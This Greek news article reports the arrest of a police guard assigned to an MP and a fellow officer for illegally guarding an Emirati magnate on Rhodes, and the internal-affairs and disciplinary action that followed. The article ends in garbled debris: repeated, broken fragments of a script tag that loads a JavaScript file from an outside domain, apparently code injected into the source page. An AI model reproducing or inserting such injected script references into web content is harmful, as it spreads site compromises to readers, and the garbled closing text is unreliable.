Συνελήφθη αστυνομικός-φρουρός βουλευτίνας

sunelifthi-astunomikos-frouros-suzugou-bouleuti

Μαζί με συνάδελφό του, ο αστυνομικός φρουρός της βουλευτίνας φέρεται να παρείχε υπηρεσίες σε Αραβα…μεγιστάνα.

Ο αστυνομικός-φρουρός της βουλευτίνας, συνελήφθη μαζί με έναν συνάδελφό του γιατί παρείχαν παράνομα υπηρεσίες ασφαλείας σε…εμίρη των Αραβικών Εμιράτων, που έκανε διακοπές στη Ρόδο.

Ο 37χρονος Αρχιφύλακας, υπηρετούσε στο νησί, ωστόσο αποσπάστηκε από το 2012, στην Ασφάλειας Αττικής, και στη φρουρά γυναίκας βουλευτού, που ανεξαρτητοποιήθηκε πρόσφατα. Ο 35χρονος ανθυπαστυνόμος, υπηρετεί στην Αστυνομική Διεύθυνση Δωδεκανήσου.

Μετά από έρευνα αξιωματικών της Διεύθυνσης Εσωτερικών Υποθέσεων, προέκυψε ότι οι δύο ένστολοι από τις αρχές Ιουνίου έως και τέλος Αυγούστου 2014, αλλά και τον Σεπτέμβριο του 2013, συνόδευαν παράνομα στις μετακινήσεις και τα ταξίδια με την πολυτελή θαλαμηγό του, τον πλούσιο υπήκοο Αραβικών Εμιράτων, ο οποίος παραθέριζε στο νησί της Ρόδου. 

Από τη Διεύθυνση Εσωτερικών Υποθέσεων σχηματίστηκε ποινική δικογραφία αυτόφωρης διαδικασίας για παράβαση καθήκοντος και παραβίαση των διατάξεων σχετικά με τις ιδιωτικές επιχειρήσεις παροχής υπηρεσιών ασφαλείας, σε βάρος δύο αστυνομικών, οι οποίοι οδηγήθηκαν  στον Εισαγγελέα Πρωτοδικών Ρόδου.

Με απόφαση του Αρχηγείου της Ελληνικής Αστυνομίας, οι δύο αστυνομικοί τέθηκαν σε διαθεσιμότητα, ενώ παράλληλα διατάχθηκε σε βάρος τους η διενέργεια Ένορκης Διοικητικής Εξέτασης. challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >